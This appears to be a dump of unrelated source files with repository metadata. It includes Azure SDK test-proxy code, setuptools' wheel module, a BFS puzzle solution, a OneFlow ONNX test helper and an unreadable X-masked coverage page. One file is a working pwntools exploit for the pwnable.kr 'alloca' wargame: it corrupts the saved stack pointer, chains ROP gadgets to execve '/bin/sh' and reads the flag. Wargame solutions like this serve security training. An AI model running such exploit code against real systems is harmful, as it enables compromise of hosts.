from azure.core.exceptions import HttpResponseError, ResourceNotFoundError
from azure.core.pipeline.policies import ContentDecodePolicy
# the functions we patch
from azure.core.pipeline.transport import RequestsTransport
# the trimming function to clean up incoming arguments to the test function we are wrapping
from azure_devtools.scenario_tests.utilities import trim_kwargs_from_test_function
from .config import PROXY_URL
from .helpers import get_test_id, is_live, is_live_and_not_recording, set_recording_id
from .proxy_startup import discovered_roots
from urllib3 import PoolManager, Retry
from urllib3.exceptions import HTTPError
import json
if TYPE_CHECKING:
from typing import Callable, Dict, Tuple
from azure.core.pipeline.transport import HttpRequest
# To learn about how to migrate SDK tests to the test proxy, please refer to the migration guide at
# https://github.com/Azure/azure-sdk-for-python/blob/main/doc/dev/test_proxy_migration_guide.md
if os.getenv("REQUESTS_CA_BUNDLE"):
http_client = PoolManager(
retries=Retry(total=3, raise_on_status=False),
cert_reqs="CERT_REQUIRED",
ca_certs=os.getenv("REQUESTS_CA_BUNDLE"),
)
else:
http_client = PoolManager(retries=Retry(total=3, raise_on_status=False))
# defaults
RECORDING_START_URL = "{}/record/start".format(PROXY_URL)
RECORDING_STOP_URL = "{}/record/stop".format(PROXY_URL)
PLAYBACK_START_URL = "{}/playback/start".format(PROXY_URL)
PLAYBACK_STOP_URL = "{}/playback/stop".format(PROXY_URL)
def get_recording_assets(test_id: str) -> str:
"""
Used to retrieve the assets.json given a PYTEST_CURRENT_TEST test id.
"""
for root in discovered_roots:
current_dir = os.path.dirname(test_id)
while current_dir is not None and not (os.path.dirname(current_dir) == current_dir):
possible_assets = os.path.join(current_dir, "assets.json")
possible_root = os.path.join(current_dir, ".git")
# we need to check for assets.json first!
if os.path.exists(os.path.join(root, possible_assets)):
complete_path = os.path.abspath(os.path.join(root, possible_assets))
return os.path.relpath(complete_path, root).replace("\\", "/")
# we need the git check to prevent ascending out of the repo
elif os.path.exists(os.path.join(root, possible_root)):
return None
else:
current_dir = os.path.dirname(current_dir)
return None
def start_record_or_playback(test_id: str) -> "Tuple[str, Dict[str, str]]":
"""Sends a request to begin recording or playing back the provided test.
This returns a tuple, (a, b), where a is the recording ID of the test and b is the `variables` dictionary that maps
test variables to values. If no variable dictionary was stored when the test was recorded, b is an empty dictionary.
"""
variables = {} # this stores a dictionary of test variable values that could have been stored with a recording
json_payload = {"x-recording-file": test_id}
assets_json = get_recording_assets(test_id)
if assets_json:
json_payload["x-recording-assets-file"] = assets_json
encoded_payload = json.dumps(json_payload).encode("utf-8")
if is_live():
result = http_client.request(
method="POST",
url=RECORDING_START_URL,
body=encoded_payload,
)
if result.status != 200:
message = six.ensure_str(result.data)
raise HttpResponseError(message=message)
recording_id = result.headers["x-recording-id"]
else:
result = http_client.request(
method="POST",
url=PLAYBACK_START_URL,
body=encoded_payload,
)
if result.status != 200:
message = six.ensure_str(result.data)
raise HttpResponseError(message=message)
try:
recording_id = result.headers["x-recording-id"]
except KeyError as ex:
six.raise_from(ValueError("No recording file found for {}".format(test_id)), ex)
if result.data:
try:
variables = json.loads(result.data.decode("utf-8"))
except ValueError as ex: # would be a JSONDecodeError on Python 3, which subclasses ValueError
six.raise_from(
ValueError("The response body returned from starting playback did not contain valid JSON"),
ex,
)
# set recording ID in a module-level variable so that sanitizers can access it
set_recording_id(test_id, recording_id)
return (recording_id, variables)
def stop_record_or_playback(test_id: str, recording_id: str, test_variables: "Dict[str, str]") -> None:
try:
if is_live():
http_client.request(
method="POST",
url=RECORDING_STOP_URL,
headers={
"x-recording-file": test_id,
"x-recording-id": recording_id,
"x-recording-save": "true",
"Content-Type": "application/json",
},
# tests don't record successfully unless test_variables is a dictionary
body=json.dumps(test_variables).encode("utf-8") if test_variables else "{}",
)
else:
http_client.request(
method="POST",
url=PLAYBACK_STOP_URL,
headers={"x-recording-id": recording_id},
)
except HTTPError as e:
raise HttpResponseError(
"The test proxy ran into an error while ending the session. Make sure any test variables you record have "
"string values."
) from e
def get_proxy_netloc() -> "Dict[str, str]":
parsed_result = url_parse.urlparse(PROXY_URL)
return {"scheme": parsed_result.scheme, "netloc": parsed_result.netloc}
def transform_request(request: "HttpRequest", recording_id: str) -> None:
"""Redirect the request to the test proxy, and store the original request URI in a header"""
headers = request.headers
parsed_result = url_parse.urlparse(request.url)
updated_target = parsed_result._replace(**get_proxy_netloc()).geturl()
if headers.get("x-recording-upstream-base-uri", None) is None:
headers["x-recording-upstream-base-uri"] = "{}://{}".format(parsed_result.scheme, parsed_result.netloc)
headers["x-recording-id"] = recording_id
headers["x-recording-mode"] = "record" if is_live() else "playback"
request.url = updated_target
def recorded_by_proxy(test_func: "Callable") -> None:
"""Decorator that redirects network requests to target the azure-sdk-tools test proxy. Use with recorded tests.
For more details and usage examples, refer to
https://github.com/Azure/azure-sdk-for-python/blob/main/doc/dev/test_proxy_migration_guide.md
"""
def record_wrap(*args, **kwargs):
def transform_args(*args, **kwargs):
copied_positional_args = list(args)
request = copied_positional_args[1]
transform_request(request, recording_id)
return tuple(copied_positional_args), kwargs
trimmed_kwargs = {k: v for k, v in kwargs.items()}
trim_kwargs_from_test_function(test_func, trimmed_kwargs)
if is_live_and_not_recording():
return test_func(*args, **trimmed_kwargs)
test_id = get_test_id()
recording_id, variables = start_record_or_playback(test_id)
original_transport_func = RequestsTransport.send
def combined_call(*args, **kwargs):
adjusted_args, adjusted_kwargs = transform_args(*args, **kwargs)
result = original_transport_func(*adjusted_args, **adjusted_kwargs)
# make the x-recording-upstream-base-uri the URL of the request
# this makes the request look like it was made to the original endpoint instead of to the proxy
# without this, things like LROPollers can get broken by polling the wrong endpoint
parsed_result = url_parse.urlparse(result.request.url)
upstream_uri = url_parse.urlparse(result.request.headers["x-recording-upstream-base-uri"])
upstream_uri_dict = {
"scheme": upstream_uri.scheme,
"netloc": upstream_uri.netloc,
}
original_target = parsed_result._replace(**upstream_uri_dict).geturl()
result.request.url = original_target
return result
RequestsTransport.send = combined_call
# call the modified function
# we define test_variables before invoking the test so the variable is defined in case of an exception
test_variables = None
try:
try:
test_variables = test_func(*args, variables=variables, **trimmed_kwargs)
except TypeError:
logger = logging.getLogger()
logger.info(
"This test can't accept variables as input. The test method should accept `**kwargs` and/or a "
"`variables` parameter to make use of recorded test variables."
)
test_variables = test_func(*args, **trimmed_kwargs)
except ResourceNotFoundError as error:
error_body = ContentDecodePolicy.deserialize_from_http_generics(error.response)
message = error_body.get("message") or error_body.get("Message")
error_with_message = ResourceNotFoundError(message=message, response=error.response)
six.raise_from(error_with_message, error)
finally:
RequestsTransport.send = original_transport_func
stop_record_or_playback(test_id, recording_id, test_variables)
return test_variables
return record_wrap
| [
"[email protected]"
] | |
3738260cd7566f69bb08576a36a0616524060ba0 | ed6625148299e759f39359db9f932dd391b8e86f | /personal_env/lib/python3.8/site-packages/setuptools/wheel.py | e17742f100132d61e0cf7083ef2ce3b873a0ef4a | [
"MIT"
] | permissive | jestinmwilson/personal-website | 128c4717b21fa6fff9df8295b1137f32bbe44b55 | 6e47a7f33ed3b1ca5c1d42c89c5380d22992ed74 | refs/heads/main | 2023-08-28T11:31:07.916714 | 2021-10-14T09:41:13 | 2021-10-14T09:41:13 | 414,847,553 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,675 | py | """Wheels support."""
from distutils.util import get_platform
from distutils import log
import email
import itertools
import os
import posixpath
import re
import zipfile
import pkg_resources
import setuptools
from pkg_resources import parse_version
from setuptools.extern.packaging.tags import sys_tags
from setuptools.extern.packaging.utils import canonicalize_name
from setuptools.extern.six import PY3
from setuptools.command.egg_info import write_requirements
__metaclass__ = type
WHEEL_NAME = re.compile(
r"""^(?P<project_name>.+?)-(?P<version>\d.*?)
((-(?P<build>\d.*?))?-(?P<py_version>.+?)-(?P<abi>.+?)-(?P<platform>.+?)
)\.whl$""",
re.VERBOSE).match
NAMESPACE_PACKAGE_INIT = '''\
try:
__import__('pkg_resources').declare_namespace(__name__)
except ImportError:
__path__ = __import__('pkgutil').extend_path(__path__, __name__)
'''
def unpack(src_dir, dst_dir):
'''Move everything under `src_dir` to `dst_dir`, and delete the former.'''
for dirpath, dirnames, filenames in os.walk(src_dir):
subdir = os.path.relpath(dirpath, src_dir)
for f in filenames:
src = os.path.join(dirpath, f)
dst = os.path.join(dst_dir, subdir, f)
os.renames(src, dst)
for n, d in reversed(list(enumerate(dirnames))):
src = os.path.join(dirpath, d)
dst = os.path.join(dst_dir, subdir, d)
if not os.path.exists(dst):
# Directory does not exist in destination,
# rename it and prune it from os.walk list.
os.renames(src, dst)
del dirnames[n]
# Cleanup.
for dirpath, dirnames, filenames in os.walk(src_dir, topdown=True):
assert not filenames
os.rmdir(dirpath)
class Wheel:
def __init__(self, filename):
match = WHEEL_NAME(os.path.basename(filename))
if match is None:
raise ValueError('invalid wheel name: %r' % filename)
self.filename = filename
for k, v in match.groupdict().items():
setattr(self, k, v)
def tags(self):
'''List tags (py_version, abi, platform) supported by this wheel.'''
return itertools.product(
self.py_version.split('.'),
self.abi.split('.'),
self.platform.split('.'),
)
def is_compatible(self):
'''Is the wheel is compatible with the current platform?'''
supported_tags = set((t.interpreter, t.abi, t.platform) for t in sys_tags())
return next((True for t in self.tags() if t in supported_tags), False)
def egg_name(self):
return pkg_resources.Distribution(
project_name=self.project_name, version=self.version,
platform=(None if self.platform == 'any' else get_platform()),
).egg_name() + '.egg'
def get_dist_info(self, zf):
# find the correct name of the .dist-info dir in the wheel file
for member in zf.namelist():
dirname = posixpath.dirname(member)
if (dirname.endswith('.dist-info') and
canonicalize_name(dirname).startswith(
canonicalize_name(self.project_name))):
return dirname
raise ValueError("unsupported wheel format. .dist-info not found")
def install_as_egg(self, destination_eggdir):
'''Install wheel as an egg directory.'''
with zipfile.ZipFile(self.filename) as zf:
self._install_as_egg(destination_eggdir, zf)
def _install_as_egg(self, destination_eggdir, zf):
dist_basename = '%s-%s' % (self.project_name, self.version)
dist_info = self.get_dist_info(zf)
dist_data = '%s.data' % dist_basename
egg_info = os.path.join(destination_eggdir, 'EGG-INFO')
self._convert_metadata(zf, destination_eggdir, dist_info, egg_info)
self._move_data_entries(destination_eggdir, dist_data)
self._fix_namespace_packages(egg_info, destination_eggdir)
@staticmethod
def _convert_metadata(zf, destination_eggdir, dist_info, egg_info):
def get_metadata(name):
with zf.open(posixpath.join(dist_info, name)) as fp:
value = fp.read().decode('utf-8') if PY3 else fp.read()
return email.parser.Parser().parsestr(value)
wheel_metadata = get_metadata('WHEEL')
# Check wheel format version is supported.
wheel_version = parse_version(wheel_metadata.get('Wheel-Version'))
wheel_v1 = (
parse_version('1.0') <= wheel_version < parse_version('2.0dev0')
)
if not wheel_v1:
raise ValueError(
'unsupported wheel format version: %s' % wheel_version)
# Extract to target directory.
os.mkdir(destination_eggdir)
zf.extractall(destination_eggdir)
# Convert metadata.
dist_info = os.path.join(destination_eggdir, dist_info)
dist = pkg_resources.Distribution.from_location(
destination_eggdir, dist_info,
metadata=pkg_resources.PathMetadata(destination_eggdir, dist_info),
)
# Note: Evaluate and strip markers now,
# as it's difficult to convert back from the syntax:
# foobar; "linux" in sys_platform and extra == 'test'
def raw_req(req):
req.marker = None
return str(req)
install_requires = list(sorted(map(raw_req, dist.requires())))
extras_require = {
extra: sorted(
req
for req in map(raw_req, dist.requires((extra,)))
if req not in install_requires
)
for extra in dist.extras
}
os.rename(dist_info, egg_info)
os.rename(
os.path.join(egg_info, 'METADATA'),
os.path.join(egg_info, 'PKG-INFO'),
)
setup_dist = setuptools.Distribution(
attrs=dict(
install_requires=install_requires,
extras_require=extras_require,
),
)
# Temporarily disable info traces.
log_threshold = log._global_log.threshold
log.set_threshold(log.WARN)
try:
write_requirements(
setup_dist.get_command_obj('egg_info'),
None,
os.path.join(egg_info, 'requires.txt'),
)
finally:
log.set_threshold(log_threshold)
@staticmethod
def _move_data_entries(destination_eggdir, dist_data):
"""Move data entries to their correct location."""
dist_data = os.path.join(destination_eggdir, dist_data)
dist_data_scripts = os.path.join(dist_data, 'scripts')
if os.path.exists(dist_data_scripts):
egg_info_scripts = os.path.join(
destination_eggdir, 'EGG-INFO', 'scripts')
os.mkdir(egg_info_scripts)
for entry in os.listdir(dist_data_scripts):
# Remove bytecode, as it's not properly handled
# during easy_install scripts install phase.
if entry.endswith('.pyc'):
os.unlink(os.path.join(dist_data_scripts, entry))
else:
os.rename(
os.path.join(dist_data_scripts, entry),
os.path.join(egg_info_scripts, entry),
)
os.rmdir(dist_data_scripts)
for subdir in filter(os.path.exists, (
os.path.join(dist_data, d)
for d in ('data', 'headers', 'purelib', 'platlib')
)):
unpack(subdir, destination_eggdir)
if os.path.exists(dist_data):
os.rmdir(dist_data)
@staticmethod
def _fix_namespace_packages(egg_info, destination_eggdir):
namespace_packages = os.path.join(
egg_info, 'namespace_packages.txt')
if os.path.exists(namespace_packages):
with open(namespace_packages) as fp:
namespace_packages = fp.read().split()
for mod in namespace_packages:
mod_dir = os.path.join(destination_eggdir, *mod.split('.'))
mod_init = os.path.join(mod_dir, '__init__.py')
if not os.path.exists(mod_dir):
os.mkdir(mod_dir)
if not os.path.exists(mod_init):
with open(mod_init, 'w') as fp:
fp.write(NAMESPACE_PACKAGE_INIT)
| [
"[email protected]"
] | |
699eda9c9fa27436875646f3e48e3a68b554030c | 94923becbb06260e3cd35dde46c3d1688c9f7feb | /wargames/pwnablekr/rookiss/alloca/win.py | b41641d53ba295cd19ff532a9f6708165421a956 | [
"MIT"
] | permissive | infernalheaven/examples | b1826d521b04ea5bf55c7c2b5a6cc620df59cfe9 | a3a3bfe2a7b9addea94396f21b73252c3bd56d49 | refs/heads/master | 2021-01-11T10:58:10.794931 | 2016-10-05T22:56:39 | 2016-10-05T22:56:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,582 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *
host = 'pwnable.kr'
user = 'alloca'
password = 'guest'
binary = '/home/%s/%s' % (user,user)
chal = os.path.basename(binary)
shell = ssh(host=host, user=user, password=password, port=2222)
if not os.path.exists(chal):
shell.download_file(binary)
shell.download_file(binary + '.c')
os.chmod(chal, 0755)
#
# Disable ASLR so that DSO addresses are constant.
#
context.aslr = False
#
# Using a negative value for alloca allows us to overwrite the saved value
# of ESP on the stack.
#
# The offset which gives us this control is -92, though -88 throuh -96 also
# work.
#
# Because of the way things work out, the stack value will be XORed with
# some random stack trash. On the up-side, it is consistent from run-to-run.
# On the downside, it is not consistent between different versions of libc.
#
# In order to have a portable exploit (works locally and remotely), we will
# force the target binary to crash once, and scrape the value of ESP at the
# segfault by loading a corefile.
#
# In order for a corefile to drop, we have to be in a writable directory
shell.set_working_directory()
shell('ln -s %s .' % binary)
#
# Launch the process, and let it die a terrible death
#
# Note that we need the setuid bit to be ignored in order for a corefile we
# can use to be dropped.
#
p = shell.process('./alloca',
setuid=0)
address = 0xdeadbeef
cookie = str(signed(address))
pattern = cyclic(64)
data = fit({0: '-92',
16: cookie,
32: pattern},
filler='\n')
#
# All of the data should be sent at the same time, so that it is all
# buffered at once. The fgets() is actually a noop since the value is negative.
#
# We are relying on the buffering behavior of scanf().
#
p.sendline(data)
p.recvall()
# Grab the corefile after it's written. It may take a second or two to appear.
pause(2)
shell.download('core')
core = Core('core')
# We want to be sure that we crashed at the 'ret'
# Either we'll crash at that instruction (stack pointer is invalid)
# or at zero (stack pointer was valid, pointed at an empty page).
assert core.eip in (0x804878a, 0)
# Find out the XOR value. This is almost-always constant, but varies by 1 bit
# on the pwnable.kr server as of writing. Luckily, the 1 bit that changes is
# the '4' bit, so as long as we pad an extra 'ret' in our ROP, we're fine.
xor = address ^ core.esp
log.info("%08x xor magic" % xor)
# Find our data in the heap
address = core.search(pattern).next()
log.info("%08x heap address" % address)
#
# We need a bit of a RET sled because the XOR value isn't perfectly constant,
# but only varies by a small amount which we can account for.
#
libc = p.libc
rop = ROP(libc)
log.info("libc is at %#x" % libc.address)
binsh = libc.search('/bin/sh\x00').next()
rop.raw(rop.ret)
rop.raw(rop.ret)
rop.raw(rop.ret)
rop.raw(rop.ret)
rop.execve(binsh,0,0)
log.info(rop.dump())
# Shoot for the middle of the RET sled
address += 8
# One very last time, to pwn it proper!
cookie = str(signed(address ^ xor))
data = fit({0: '-92',
16: cookie,
32: str(rop)},
filler='\n')
p = shell.process('./alloca')
# shell.upload('~/bin/gdbserver')
# shell('chmod +x gdbserver')
# p = gdb.debug('./alloca', '''
# break *0x804878a
# set follow-fork-mode child
# catch exec
# continue
# ''', ssh=shell)
p.sendline(data)
p.recvuntil('$')
p.clean()
p.sendline('cat /home/alloca/flag')
flag = p.recvline().strip()
log.success('Flag: %r' % flag)
p.interactive(prompt='')
| [
"[email protected]"
] | |
95c8d89866be1ab21e245c5c39170e3918f41ece | 78c4ccb183a99ebaabcdc3a3a69f029e4aee0f5c | /AlgorithmStudy/백준/무지성 랜덤풀이/9월/9.27/13549 숨바꼭질3.py | e0e130cd47181bea752f97e6b07942782346f798 | [] | no_license | cladren123/study | ef2c45bc489fa658dbc9360fb0b0de53250500e5 | 241326e618f1f3bb1568d588bf6f53b78920587a | refs/heads/master | 2023-09-02T02:21:24.560967 | 2021-11-05T12:20:06 | 2021-11-05T12:20:06 | 368,753,950 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,339 | py | """
문제유형 :
그래프 이론
그래프 탐색
너비 우선 탐색
다익스트라
0-1 너비 우선 탐색
시간초과 발생
범위를 지정해서 범위가 초과하는 것들을 걷어내니 해결할 수 있었다.
"""
import sys
from collections import deque
input = sys.stdin.readline
# n : 수빈 k : 동생
n, m = map(int, input().split())
# 최대 크기 변수
maxnum = 100001
# x 지점에 도착했을 때 시간을 담을 리스트
timelist = [-1] * maxnum
# x 지점을 방문했는지 표시하는 리스트
visited = [0] * maxnum
# 초기화 하는 과정도 중요하다. -> 하지 않으면 에러 발생
que = deque()
que.append(n)
timelist[n] = 0
visited[n] = 1
while que :
loc = que.popleft()
# *2 인 경우, 시간을 소요하지 않으므로 먼저 탐색하게 만든다.
if loc*2 < maxnum and visited[loc*2] == 0 :
timelist[loc*2] = timelist[loc]
visited[loc*2] = 1
que.appendleft(loc*2)
# +1 인 경우
if loc+1 < maxnum and visited[loc+1] == 0 :
visited[loc+1] = 1
timelist[loc+1] = timelist[loc] + 1
que.append(loc+1)
# -1 인 경우
if loc-1 >= 0 and visited[loc-1] == 0 :
visited[loc-1] = 1
timelist[loc-1] = timelist[loc] + 1
que.append(loc-1)
print(timelist[m])
| [
"[email protected]"
] | |
c87601687dd5c7c65e20dba92b239e070261b317 | 3670f46666214ef5e1ce6765e47b24758f3614a9 | /oneflow/python/test/onnx/util.py | d2222f7d6b30cad257fa79d950b134ab33ead31c | [
"Apache-2.0"
] | permissive | ashing-zhang/oneflow | 0b8bb478ccd6cabea2dca0864defddab231919bf | 70db228a4d361c916f8f8d85e908795b479e5d20 | refs/heads/master | 2022-12-14T21:13:46.752535 | 2020-09-07T03:08:52 | 2020-09-07T03:08:52 | 293,535,931 | 1 | 0 | Apache-2.0 | 2020-09-07T13:28:25 | 2020-09-07T13:28:24 | null | UTF-8 | Python | false | false | 2,994 | py | """
Copyright 2020 The OneFlow Authors. All rights reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import numpy as np
import oneflow as flow
import onnxruntime as ort
import onnx
from collections import OrderedDict
import tempfile
import os
import shutil
def convert_to_onnx_and_check(
job_func,
print_outlier=False,
explicit_init=True,
external_data=False,
ort_optimize=True,
opset=None,
):
check_point = flow.train.CheckPoint()
if explicit_init:
# it is a trick to keep check_point.save() from hanging when there is no variable
@flow.global_function(flow.FunctionConfig())
def add_var():
return flow.get_variable(
name="trick",
shape=(1,),
dtype=flow.float,
initializer=flow.random_uniform_initializer(),
)
check_point.init()
flow_weight_dir = tempfile.TemporaryDirectory()
check_point.save(flow_weight_dir.name)
# TODO(daquexian): a more elegant way?
while not os.path.exists(os.path.join(flow_weight_dir.name, "snapshot_done")):
pass
onnx_model_dir = tempfile.TemporaryDirectory()
onnx_model_path = os.path.join(onnx_model_dir.name, "model.onnx")
flow.onnx.export(
job_func,
flow_weight_dir.name,
onnx_model_path,
opset=opset,
external_data=external_data,
)
flow_weight_dir.cleanup()
ort_sess_opt = ort.SessionOptions()
ort_sess_opt.graph_optimization_level = (
ort.GraphOptimizationLevel.ORT_ENABLE_EXTENDED
if ort_optimize
else ort.GraphOptimizationLevel.ORT_DISABLE_ALL
)
sess = ort.InferenceSession(onnx_model_path, sess_options=ort_sess_opt)
onnx_model_dir.cleanup()
assert len(sess.get_outputs()) == 1
assert len(sess.get_inputs()) <= 1
ipt_dict = OrderedDict()
for ipt in sess.get_inputs():
ipt_data = np.random.uniform(low=-10, high=10, size=ipt.shape).astype(
np.float32
)
ipt_dict[ipt.name] = ipt_data
onnx_res = sess.run([], ipt_dict)[0]
oneflow_res = job_func(*ipt_dict.values()).get().numpy()
rtol, atol = 1e-2, 1e-5
if print_outlier:
a = onnx_res.flatten()
b = oneflow_res.flatten()
for i in range(len(a)):
if np.abs(a[i] - b[i]) > atol + rtol * np.abs(b[i]):
print("a[{}]={}, b[{}]={}".format(i, a[i], i, b[i]))
assert np.allclose(onnx_res, oneflow_res, rtol=rtol, atol=atol)
| [
"[email protected]"
] | |
a6e84ede469fbe72771be78c555a5612ccf2e137 | 492d3e666b87eff971628a74fe13facde01e2949 | /htmlcov/_python_Django_My Projects_student-portal_Lib_site-packages_ckeditor_uploader_backends___init___py.html.py | 798d55fc791e5536bdf76c670715ec7c0d91fbb8 | [] | no_license | OmarFateh/Student-Portal | 42050da15327aa01944dc79b5e00ca34deb51531 | 167ffd3a4183529c0cbc5db4ab232026711ea915 | refs/heads/master | 2023-06-13T01:03:16.475588 | 2021-07-08T11:09:09 | 2021-07-08T11:09:09 | 382,895,837 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,201 | py | XXXXXXXXX XXXXX
XXXXXX
XXXXXX
XXXXX XXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXX
XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXX XX
XXXXXXXXXXXXXXX XXX XXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXX
XXXXX XXXXXXXXXX XXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXX
XXXXX XXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXX
XXXXXXX XXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXX XXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXX XXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXX XXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXX XXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXX
XXXXXXX
XXXXX XXXXXXXXXXXXXXX
XXXX XXXXXXXXXXXX
XXXX XXXXXXXXXXXXXXXX
XXXXXXXXXXXX XXX XXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX X
XXXXX XXXXXXXXXXXXXXXXXXXXXXXXX
XXXXX
XXXX XXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXX XXXXXXXXX XXXXXXXX XXXXXXXXXX XX
XXX XXXXXXXXXXXXXX
XX XXXXXXXXXX XXXXXX
XXXXXXX XXXXXXXXXXXXX XXXXXXXXXX XXXXXXXXXX XXXXXXXXXXXXXXXXXX XXXXXXXXXXXXX XXXXX XXXXXXX XXXXXXXXXXXX
XXXXXXX XXXXXXXXXXXXX XXXXXXXXXX XXXXXXXX XXXXXXXXXX XXXXXXXXXXXXXXXXXX XXXXXXXXXXXXX XXXXX XXXXXXXXXX XXXXXXXXXXXXXXXX
XXXXXXX XXXXXXXXXXXXX XXXXXXXXXX XXXXXXXX XXXXXXXXXX XXXXXXXXXXXXXXXXXX XXXXXXXXXXXXX XXXXX XXXXXXXXXXX XXXXXXXXXXXXXXXXX
XXXXX
XXXXXX
XXXXXX
XXXX XXXXXXXXXXXXXXXXXXX
XXXX XXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXX XXXXXXXXX XXXXXXXX XXXXXXXXXX XX
XX XXXXXXXXXXXXXXXXXXXXXXX XX XXXX XXXXXXXX
XXXXX
XX XXXXXXXXXXXXXXXX
XXXXX XXXXXXXXXXXXXXXXXXXX
XXXXX XXXXXXXXXXXXXXXXXXXX
XXXXX XXXXXXXXXXXXXXXXXXXX
XXXXX XXXXXXXXXXXXXXXXXXXX XXXXXX XXXXXX XXXX XXXXXXXX
XXXX
XX XXXXXXXXXXXXXXXX
XXXXX XXXXXXXXXXXXXXXXXXXX
XXXXX XXXXXXXXXXXXXXXXXXXX XXXXXX XXXXXXXXX XXXXXXXXXXX XXXXX
XXXX
XX XXXXXXXXXXXXXXXX
XXXXX XXXXXXXXXXXXXXXXXXXX XXXXXX XXXXXX XXX XX XXXX
XXXX
XX XXXXXXXXXXXXXXXX
XXXXX XXXXXXXXXXXXXXXXXXXX XXXXXX XXXXX XXXXX XXXXXXXXXXX XXXXX
XXXX
XXXXXX
XXXXXX
XXXX XXXXXXXXXXXX
XX XXXXXXX XXXXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXX XXXXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXX XXXXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXX XXXXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXX XXXXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXX XXXXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXX XXXXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXX XXXXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
